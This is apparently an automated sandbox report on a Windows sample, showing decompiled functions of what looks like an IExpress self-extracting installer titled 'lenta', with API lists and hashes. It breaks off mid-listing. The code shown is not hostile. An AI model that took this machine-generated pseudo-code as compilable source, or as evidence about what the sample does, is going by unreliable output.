                                                                      • Instruction ID: 7979f0518e35903d1460b7b3b5594545e0511ca9872e5ea93d573e2bc4af8d3d
                                                                      • Opcode Fuzzy Hash: 197b8c08f1d4480a067e0bc1101e8bb9c6db6a28c3e4ff0bec0f8e9958fd30d1
                                                                      • Instruction Fuzzy Hash: E3D1B971A042255EEFBEDA3C88483FA7FB3AB56344F0441EAC596CA185D77489C2CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E011D18A3(void* __edx, void* __esi) {
                                                                      				signed int _v8;
                                                                      				short _v12;
                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                      				char _v20;
                                                                      				long _v24;
                                                                      				void* _v28;
                                                                      				void* _v32;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				signed int _t23;
                                                                      				long _t45;
                                                                      				void* _t49;
                                                                      				int _t50;
                                                                      				void* _t52;
                                                                      				signed int _t53;
                                                                      
                                                                      				_t51 = __esi;
                                                                      				_t49 = __edx;
                                                                      				_t23 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t23 ^ _t53;
                                                                      				_t25 =  *0x11d8128; // 0x2
                                                                      				_t45 = 0;
                                                                      				_v12 = 0x500;
                                                                      				_t50 = 2;
                                                                      				_v16.Value = 0;
                                                                      				_v20 = 0;
                                                                      				if(_t25 != _t50) {
                                                                      					L20:
                                                                      					return E011D6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                      				}
                                                                      				if(E011D17EE( &_v20) != 0) {
                                                                      					_t25 = _v20;
                                                                      					if(_v20 != 0) {
                                                                      						 *0x11d8128 = 1;
                                                                      					}
                                                                      					goto L20;
                                                                      				}
                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                      					L17:
                                                                      					CloseHandle(_v28);
                                                                      					_t25 = _v20;
                                                                      					goto L20;
                                                                      				} else {
                                                                      					_push(__esi);
                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                      					if(_t52 == 0) {
                                                                      						L16:
                                                                      						_pop(_t51);
                                                                      						goto L17;
                                                                      					}
                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                      						L15:
                                                                      						LocalFree(_t52);
                                                                      						goto L16;
                                                                      					} else {
                                                                      						if( *_t52 <= 0) {
                                                                      							L14:
                                                                      							FreeSid(_v32);
                                                                      							goto L15;
                                                                      						}
                                                                      						_t15 = _t52 + 4; // 0x4
                                                                      						_t50 = _t15;
                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                      							_t45 = _t45 + 1;
                                                                      							_t50 = _t50 + 8;
                                                                      							if(_t45 <  *_t52) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L14;
                                                                      						}
                                                                      						 *0x11d8128 = 1;
                                                                      						_v20 = 1;
                                                                      						goto L14;
                                                                      					}
                                                                      				}
                                                                      			}



















                                                                      APIs
                                                                        • Part of subcall function 011D17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,011D18DD), ref: 011D181A
                                                                        • Part of subcall function 011D17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 011D182C
                                                                        • Part of subcall function 011D17EE: AllocateAndInitializeSid.ADVAPI32(011D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,011D18DD), ref: 011D1855
                                                                        • Part of subcall function 011D17EE: FreeSid.ADVAPI32(?,?,?,?,011D18DD), ref: 011D1883
                                                                        • Part of subcall function 011D17EE: FreeLibrary.KERNEL32(00000000,?,?,?,011D18DD), ref: 011D188A
                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 011D18EB
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 011D18F2
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 011D190A
                                                                      • GetLastError.KERNEL32 ref: 011D1918
                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 011D192C
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 011D1944
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 011D1964
                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 011D197A
                                                                      • FreeSid.ADVAPI32(?), ref: 011D199C
                                                                      • LocalFree.KERNEL32(00000000), ref: 011D19A3
                                                                      • CloseHandle.KERNEL32(?), ref: 011D19AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                      • String ID:
                                                                      • API String ID: 2168512254-0
                                                                      • Opcode ID: 00415846f0d704da1adb0e1fb86bcd30b61b9acaee21dba84aa8b870c4b400d9
                                                                      • Instruction ID: b479b92e8be0494e3983e71e67d2290bc25458af5c171c9cb1dc99a0115e9070
                                                                      • Opcode Fuzzy Hash: 00415846f0d704da1adb0e1fb86bcd30b61b9acaee21dba84aa8b870c4b400d9
                                                                      • Instruction Fuzzy Hash: C6312C71A0220ABFDB29DFA9EC88AAFBBBDFF04750F104429E655D2144E7309945CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E011D1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                      				void* _v28;
                                                                      				void* __ebx;
                                                                      				signed int _t13;
                                                                      				int _t21;
                                                                      				void* _t25;
                                                                      				int _t28;
                                                                      				signed char _t30;
                                                                      				void* _t38;
                                                                      				void* _t40;
                                                                      				void* _t41;
                                                                      				signed int _t46;
                                                                      
                                                                      				_t41 = __esi;
                                                                      				_t38 = __edi;
                                                                      				_t30 = __ecx;
                                                                      				if((__ecx & 0x00000002) != 0) {
                                                                      					L12:
                                                                      					if((_t30 & 0x00000004) != 0) {
                                                                      						L14:
                                                                      						if( *0x11d9a40 != 0) {
                                                                      							_pop(_t30);
                                                                      							_t44 = _t46;
                                                                      							_t13 =  *0x11d8004; // 0xdc3102d5
                                                                      							_v8 = _t13 ^ _t46;
                                                                      							_push(_t38);
                                                                      							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                      								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                      								_v24.PrivilegeCount = 1;
                                                                      								_v12 = 2;
                                                                      								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                      								CloseHandle(_v28);
                                                                      								_t41 = _t41;
                                                                      								_push(0);
                                                                      								if(_t21 != 0) {
                                                                      									if(ExitWindowsEx(2, ??) != 0) {
                                                                      										_t25 = 1;
                                                                      									} else {
                                                                      										_t37 = 0x4f7;
                                                                      										goto L3;
                                                                      									}
                                                                      								} else {
                                                                      									_t37 = 0x4f6;
                                                                      									goto L4;
                                                                      								}
                                                                      							} else {
                                                                      								_t37 = 0x4f5;
                                                                      								L3:
                                                                      								_push(0);
                                                                      								L4:
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								E011D44B9(0, _t37);
                                                                      								_t25 = 0;
                                                                      							}
                                                                      							_pop(_t40);
                                                                      							return E011D6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                      						} else {
                                                                      							_t28 = ExitWindowsEx(2, 0);
                                                                      							goto L16;
                                                                      						}
                                                                      					} else {
                                                                      						_t37 = 0x522;
                                                                      						_t28 = E011D44B9(0, 0x522, 0x11d1140, 0, 0x40, 4);
                                                                      						if(_t28 != 6) {
                                                                      							goto L16;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					__eax = E011D1EA7(__ecx);
                                                                      					if(__eax != 2) {
                                                                      						L16:
                                                                      						return _t28;
                                                                      					} else {
                                                                      						goto L12;
                                                                      					}
                                                                      				}
                                                                      			}


















                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 011D1EFB
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 011D1F02
                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 011D1FD3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitOpenTokenWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2795981589-3733053543
                                                                      • Opcode ID: 4ea9d8b2316c4ac25960a8872f08037fd3265a6e85af1044877e60808758923d
                                                                      • Instruction ID: ba28f942805567615291c9262248362fb24afac8bc529e438b812e63dde10b7d
                                                                      • Opcode Fuzzy Hash: 4ea9d8b2316c4ac25960a8872f08037fd3265a6e85af1044877e60808758923d
                                                                      • Instruction Fuzzy Hash: 9121E5B1A422057BDB389AB9DC49FBF77B8EB85B50F100068FA12E6185D77484858362
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D7155() {
                                                                      				void* _v8;
                                                                      				struct _FILETIME _v16;
                                                                      				signed int _v20;
                                                                      				union _LARGE_INTEGER _v24;
                                                                      				signed int _t23;
                                                                      				signed int _t36;
                                                                      				signed int _t37;
                                                                      				signed int _t39;
                                                                      
                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                      				_t23 =  *0x11d8004; // 0xdc3102d5
                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                      					QueryPerformanceCounter( &_v24);
                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                      					_t39 = _t36;
                                                                      					if(_t36 == 0xbb40e64e || ( *0x11d8004 & 0xffff0000) == 0) {
                                                                      						_t36 = 0xbb40e64f;
                                                                      						_t39 = 0xbb40e64f;
                                                                      					}
                                                                      					 *0x11d8004 = _t39;
                                                                      				}
                                                                      				_t37 =  !_t36;
                                                                      				 *0x11d8008 = _t37;
                                                                      				return _t37;
                                                                      			}












                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 011D7182
                                                                      • GetCurrentProcessId.KERNEL32 ref: 011D7191
                                                                      • GetCurrentThreadId.KERNEL32 ref: 011D719A
                                                                      • GetTickCount.KERNEL32 ref: 011D71A3
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 011D71B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: ae4da7cd84fe476a0f2e25427764a10f90eb54098144a3c84c0278d62aae0946
                                                                      • Instruction ID: 34f4272d54ffe82c03cabcea8b3862e343e9b261449ce4f399f0512a0b05ffdc
                                                                      • Opcode Fuzzy Hash: ae4da7cd84fe476a0f2e25427764a10f90eb54098144a3c84c0278d62aae0946
                                                                      • Instruction Fuzzy Hash: 7A113A71D02218DBCF28DFB8E648A9EBBF5EF08314F654966D811E7244E7309A41CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                      
                                                                      				SetUnhandledExceptionFilter(0);
                                                                      				UnhandledExceptionFilter(_a4);
                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                      			}




                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,011D6E26,011D1000), ref: 011D6CF7
                                                                      • UnhandledExceptionFilter.KERNEL32(011D6E26,?,011D6E26,011D1000), ref: 011D6D00
                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,011D6E26,011D1000), ref: 011D6D0B
                                                                      • TerminateProcess.KERNEL32(00000000,?,011D6E26,011D1000), ref: 011D6D12
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                      • String ID:
                                                                      • API String ID: 3231755760-0
                                                                      • Opcode ID: dd44ca2d95d6270cf2acb9cd1d51eecb1a54c3c9942cda335c5bea362656be6b
                                                                      • Instruction ID: 59a4137d29a499036f371454e374ad39d0e4b11b794826c670547c7a9ae90afe
                                                                      • Opcode Fuzzy Hash: dd44ca2d95d6270cf2acb9cd1d51eecb1a54c3c9942cda335c5bea362656be6b
                                                                      • Instruction Fuzzy Hash: 00D0C932003108FBDB246BF1F80CA593F28EF48292F444020F33983004CA3244918B51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E011D3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				void* __edi;
                                                                      				void* _t6;
                                                                      				void* _t10;
                                                                      				int _t20;
                                                                      				int _t21;
                                                                      				int _t23;
                                                                      				char _t24;
                                                                      				long _t25;
                                                                      				int _t27;
                                                                      				int _t30;
                                                                      				void* _t32;
                                                                      				int _t33;
                                                                      				int _t34;
                                                                      				int _t37;
                                                                      				int _t38;
                                                                      				int _t39;
                                                                      				void* _t42;
                                                                      				void* _t46;
                                                                      				CHAR* _t49;
                                                                      				void* _t58;
                                                                      				void* _t63;
                                                                      				struct HWND__* _t64;
                                                                      
                                                                      				_t64 = _a4;
                                                                      				_t6 = _a8 - 0x10;
                                                                      				if(_t6 == 0) {
                                                                      					_push(0);
                                                                      					L38:
                                                                      					EndDialog(_t64, ??);
                                                                      					L39:
                                                                      					__eflags = 1;
                                                                      					return 1;
                                                                      				}
                                                                      				_t42 = 1;
                                                                      				_t10 = _t6 - 0x100;
                                                                      				if(_t10 == 0) {
                                                                      					E011D43D0(_t64, GetDesktopWindow());
                                                                      					SetWindowTextA(_t64, "lenta");
                                                                      					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                      					__eflags =  *0x11d9a40 - _t42; // 0x3
                                                                      					if(__eflags == 0) {
                                                                      						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                      					}
                                                                      					L36:
                                                                      					return _t42;
                                                                      				}
                                                                      				if(_t10 == _t42) {
                                                                      					_t20 = _a12 - 1;
                                                                      					__eflags = _t20;
                                                                      					if(_t20 == 0) {
                                                                      						_t21 = GetDlgItemTextA(_t64, 0x835, 0x11d91e4, 0x104);
                                                                      						__eflags = _t21;
                                                                      						if(_t21 == 0) {
                                                                      							L32:
                                                                      							_t58 = 0x4bf;
                                                                      							_push(0);
                                                                      							_push(0x10);
                                                                      							_push(0);
                                                                      							_push(0);
                                                                      							L25:
                                                                      							E011D44B9(_t64, _t58);
                                                                      							goto L39;
                                                                      						}
                                                                      						_t49 = 0x11d91e4;
                                                                      						do {
                                                                      							_t23 =  *_t49;
                                                                      							_t49 =  &(_t49[1]);
                                                                      							__eflags = _t23;
                                                                      						} while (_t23 != 0);
                                                                      						__eflags = _t49 - 0x11d91e5 - 3;
                                                                      						if(_t49 - 0x11d91e5 < 3) {
                                                                      							goto L32;
                                                                      						}
                                                                      						_t24 =  *0x11d91e5; // 0x3a
                                                                      						__eflags = _t24 - 0x3a;
                                                                      						if(_t24 == 0x3a) {
                                                                      							L21:
                                                                      							_t25 = GetFileAttributesA(0x11d91e4);
                                                                      							__eflags = _t25 - 0xffffffff;
                                                                      							if(_t25 != 0xffffffff) {
                                                                      								L26:
                                                                      								E011D658A(0x11d91e4, 0x104, 0x11d1140);
                                                                      								_t27 = E011D58C8(0x11d91e4);
                                                                      								__eflags = _t27;
                                                                      								if(_t27 != 0) {
                                                                      									__eflags =  *0x11d91e4 - 0x5c;
                                                                      									if( *0x11d91e4 != 0x5c) {
                                                                      										L30:
                                                                      										_t30 = E011D597D(0x11d91e4, 1, _t64, 1);
                                                                      										__eflags = _t30;
                                                                      										if(_t30 == 0) {
                                                                      											L35:
                                                                      											_t42 = 1;
                                                                      											__eflags = 1;
                                                                      											goto L36;
                                                                      										}
                                                                      										L31:
                                                                      										_t42 = 1;
                                                                      										EndDialog(_t64, 1);
                                                                      										goto L36;
                                                                      									}
                                                                      									__eflags =  *0x11d91e5 - 0x5c;
                                                                      									if( *0x11d91e5 == 0x5c) {
                                                                      										goto L31;
                                                                      									}
                                                                      									goto L30;
                                                                      								}
                                                                      								_push(0);
                                                                      								_push(0x10);
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								_t58 = 0x4be;
                                                                      								goto L25;
                                                                      							}
                                                                      							_t32 = E011D44B9(_t64, 0x54a, 0x11d91e4, 0, 0x20, 4);
                                                                      							__eflags = _t32 - 6;
                                                                      							if(_t32 != 6) {
                                                                      								goto L35;
                                                                      							}
                                                                      							_t33 = CreateDirectoryA(0x11d91e4, 0);
                                                                      							__eflags = _t33;
                                                                      							if(_t33 != 0) {
                                                                      								goto L26;
                                                                      							}
                                                                      							_push(0);
                                                                      							_push(0x10);
                                                                      							_push(0);
                                                                      							_push(0x11d91e4);
                                                                      							_t58 = 0x4cb;
                                                                      							goto L25;
                                                                      						}
                                                                      						__eflags =  *0x11d91e4 - 0x5c;
                                                                      						if( *0x11d91e4 != 0x5c) {
                                                                      							goto L32;
                                                                      						}
                                                                      						__eflags = _t24 - 0x5c;
                                                                      						if(_t24 != 0x5c) {
                                                                      							goto L32;
                                                                      						}
                                                                      						goto L21;
                                                                      					}
                                                                      					_t34 = _t20 - 1;
                                                                      					__eflags = _t34;
                                                                      					if(_t34 == 0) {
                                                                      						EndDialog(_t64, 0);
                                                                      						 *0x11d9124 = 0x800704c7;
                                                                      						goto L39;
                                                                      					}
                                                                      					__eflags = _t34 != 0x834;
                                                                      					if(_t34 != 0x834) {
                                                                      						goto L36;
                                                                      					}
                                                                      					_t37 = LoadStringA( *0x11d9a3c, 0x3e8, 0x11d8598, 0x200);
                                                                      					__eflags = _t37;
                                                                      					if(_t37 != 0) {
                                                                      						_t38 = E011D4224(_t64, _t46, _t46);
                                                                      						__eflags = _t38;
                                                                      						if(_t38 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0x11d87a0);
                                                                      						__eflags = _t39;
                                                                      						if(_t39 != 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t63 = 0x4c0;
                                                                      						L9:
                                                                      						E011D44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                      						_push(0);
                                                                      						goto L38;
                                                                      					}
                                                                      					_t63 = 0x4b1;
                                                                      					goto L9;
                                                                      				}
                                                                      				return 0;
                                                                      			}


























                                                                      APIs
                                                                      • LoadStringA.USER32(000003E8,011D8598,00000200), ref: 011D3271
                                                                      • GetDesktopWindow.USER32 ref: 011D33E2
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 011D33F7
                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 011D3410
                                                                      • GetDlgItem.USER32(?,00000836), ref: 011D3426
                                                                      • EnableWindow.USER32(00000000), ref: 011D342D
                                                                      • EndDialog.USER32(?,00000000), ref: 011D343F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                      • API String ID: 2418873061-406680565
                                                                      • Opcode ID: 263c51c6c417ba7b9ff090e3c079833ea996e11d0655c859d879d452511def96
                                                                      • Instruction ID: 1a96b866bd6e13f793ac599e087216de900bb45378162114c21b08e29099e008
                                                                      • Opcode Fuzzy Hash: 263c51c6c417ba7b9ff090e3c079833ea996e11d0655c859d879d452511def96
                                                                      • Instruction Fuzzy Hash: 3B5127B039725176EB3E5A796C8CF7B2E59BF46B58F004038F265965C5CFA88441C363
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E011D2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t13;
                                                                      				void* _t20;
                                                                      				void* _t23;
                                                                      				void* _t27;
                                                                      				struct HRSRC__* _t31;
                                                                      				intOrPtr _t33;
                                                                      				void* _t43;
                                                                      				void* _t48;
                                                                      				signed int _t65;
                                                                      				struct HINSTANCE__* _t66;
                                                                      				signed int _t67;
                                                                      
                                                                      				_t13 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t13 ^ _t67;
                                                                      				_t65 = 0;
                                                                      				_t66 = __ecx;
                                                                      				_t48 = __edx;
                                                                      				 *0x11d9a3c = __ecx;
                                                                      				memset(0x11d9140, 0, 0x8fc);
                                                                      				memset(0x11d8a20, 0, 0x32c);
                                                                      				memset(0x11d88c0, 0, 0x104);
                                                                      				 *0x11d93ec = 1;
                                                                      				_t20 = E011D468F("TITLE", 0x11d9154, 0x7f);
                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                      					_t64 = 0x4b1;
                                                                      					goto L32;
                                                                      				} else {
                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                      					 *0x11d858c = _t27;
                                                                      					SetEvent(_t27);
                                                                      					_t64 = 0x11d9a34;
                                                                      					if(E011D468F("EXTRACTOPT", 0x11d9a34, 4) != 0) {
                                                                      						if(( *0x11d9a34 & 0x000000c0) == 0) {
                                                                      							L12:
                                                                      							 *0x11d9120 =  *0x11d9120 & _t65;
                                                                      							if(E011D5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                      								if( *0x11d8a3a == 0) {
                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                      									if(_t31 != 0) {
                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                      									}
                                                                      									if( *0x11d8184 != 0) {
                                                                      										__imp__#17();
                                                                      									}
                                                                      									if( *0x11d8a24 == 0) {
                                                                      										_t57 = _t65;
                                                                      										if(E011D36EE(_t65) == 0) {
                                                                      											goto L33;
                                                                      										} else {
                                                                      											_t33 =  *0x11d9a40; // 0x3
                                                                      											_t48 = 1;
                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                      												if(( *0x11d9a34 & 0x00000100) == 0 || ( *0x11d8a38 & 0x00000001) != 0 || E011D18A3(_t64, _t66) != 0) {
                                                                      													goto L30;
                                                                      												} else {
                                                                      													_t64 = 0x7d6;
                                                                      													if(E011D6517(_t57, 0x7d6, _t34, E011D19E0, 0x547, 0x83e) != 0x83d) {
                                                                      														goto L33;
                                                                      													} else {
                                                                      														goto L30;
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												L30:
                                                                      												_t23 = _t48;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_t23 = 1;
                                                                      									}
                                                                      								} else {
                                                                      									E011D2390(0x11d8a3a);
                                                                      									goto L33;
                                                                      								}
                                                                      							} else {
                                                                      								_t64 = 0x520;
                                                                      								L32:
                                                                      								E011D44B9(0, _t64, 0, 0, 0x10, 0);
                                                                      								goto L33;
                                                                      							}
                                                                      						} else {
                                                                      							_t64 =  &_v268;
                                                                      							if(E011D468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                      								goto L3;
                                                                      							} else {
                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                      								 *0x11d8588 = _t43;
                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                      									goto L12;
                                                                      								} else {
                                                                      									if(( *0x11d9a34 & 0x00000080) == 0) {
                                                                      										_t64 = 0x524;
                                                                      										if(E011D44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                      											goto L12;
                                                                      										} else {
                                                                      											goto L11;
                                                                      										}
                                                                      									} else {
                                                                      										_t64 = 0x54b;
                                                                      										E011D44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                      										L11:
                                                                      										CloseHandle( *0x11d8588);
                                                                      										 *0x11d9124 = 0x800700b7;
                                                                      										goto L33;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						L3:
                                                                      						_t64 = 0x4b1;
                                                                      						E011D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      						 *0x11d9124 = 0x80070714;
                                                                      						L33:
                                                                      						_t23 = 0;
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                      			}




















                                                                      APIs
                                                                      • memset.MSVCRT ref: 011D2CD9
                                                                      • memset.MSVCRT ref: 011D2CE9
                                                                      • memset.MSVCRT ref: 011D2CF9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                        • Part of subcall function 011D468F: SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                        • Part of subcall function 011D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                        • Part of subcall function 011D468F: LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                        • Part of subcall function 011D468F: LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                        • Part of subcall function 011D468F: memcpy_s.MSVCRT ref: 011D46E5
                                                                        • Part of subcall function 011D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
